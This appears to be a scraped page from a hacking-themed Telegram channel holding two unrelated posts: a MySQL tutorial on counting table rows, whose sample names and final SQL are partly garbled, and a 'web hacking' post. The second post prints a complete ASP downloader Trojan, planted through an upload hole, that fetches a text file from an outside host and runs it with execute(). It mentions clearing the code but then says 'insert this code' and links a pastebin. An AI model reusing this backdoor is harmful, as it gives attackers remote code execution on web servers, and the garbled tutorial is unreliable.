UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.1K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘#Methode MySQL Row Count: How to get the number of rows in MySQL :

 To get the number of rows in one table, you use the COUNT (*) statement in SELECT like this:

SELECT
COUNT (*)
FROM
table_name;


2) For example, to get the number of rows in the grayex table in the sample database, use the following statement:

SELECT
COUNT (*)
FROM
andreyex;


+ ---------- +
| COUNT (*) |
+ ---------- +
| 35 |
+ ---------- +
1 row in set (0.01 sec)

4) Getting the number of MySQL rows in two or more tables, to get the number of rows across multiple tables, you use the UNION statement to combine the result sets returned by each individual SELECT statement.

5) For example, to get the number of rows of gray and trainings tables in one query, use the following statement.

SELECT
'andreyex' tablename,
COUNT (*) rows
FROM
andreyex
UNION
SELECT
'trainings' tablename,
COUNT (*) rows
FROM
trainings;

+ ----------- + ------ +
| tablename | rows |
+ ----------- + ------ +
| andreyex | 34 |
| trainings | 451 |
+ ----------- + ------ +
2 rows in set (0.01 sec)


6) Getting the number of MySQL rows of all tables in a specific database, to get the row count of all tables in a specific database like classicmodels you use the following steps:

First, get all the table names in the database
Second, create an SQL statement that includes all SELECT COUNT (*) FROM table_name statements for all UNION delimited tables.
Third, execute the SQL statement using the prepared statement
First, to get all the table names in a database, you query the following from the information_schema database:

SELECT
table_name
FROM
information_schema.tables
WHERE
table_schema = 'classicmodels'
AND table_type = 'BASE TABLE';




+ -------------- +
| TABLE_NAME |
+ -------------- +
| andreyex |
| trainings |
| sites |
+ -------------- +
3 rows in set (0.02 sec)


Second, to build the SQL statement, we use the GROUP_CONCAT and CONCAT functions as follows:

SELECT
CONCAT (GROUP_CONCAT (CONCAT ('SELECT \' ',
table_name,
'\' table_name, COUNT (*) rows FROM ',
table_name)
SEPARATOR 'UNION'),
'ORDER BY table_name')
INTO @sql
FROM
table_list;


enjoyβ€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘WEB HACKING #METHODE :

1) This time the user is a downloader Trojan. The hacker inserted the following code under foot.asp in the root directory of the website through the website upload vulnerability:


<%
'by*
aming Function Gethtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
Gethtml=ObjXMLHTTP .responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode = 3
objStream.Open
objStream.Write Gethtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
Gethtml = objStream.ReadText
objStream.Close
set objStream=Nothing
End Function
execute(Gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt"))
%>

2) The problem can be solved by clearing this code. The results of the website Trojan cleaning experts
- The content of xmlasaquan.txt is as follows:

then insert this code :

https://pastebin.com/Xr4x50Za

enjoyβ€οΈπŸ‘πŸ»
written
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁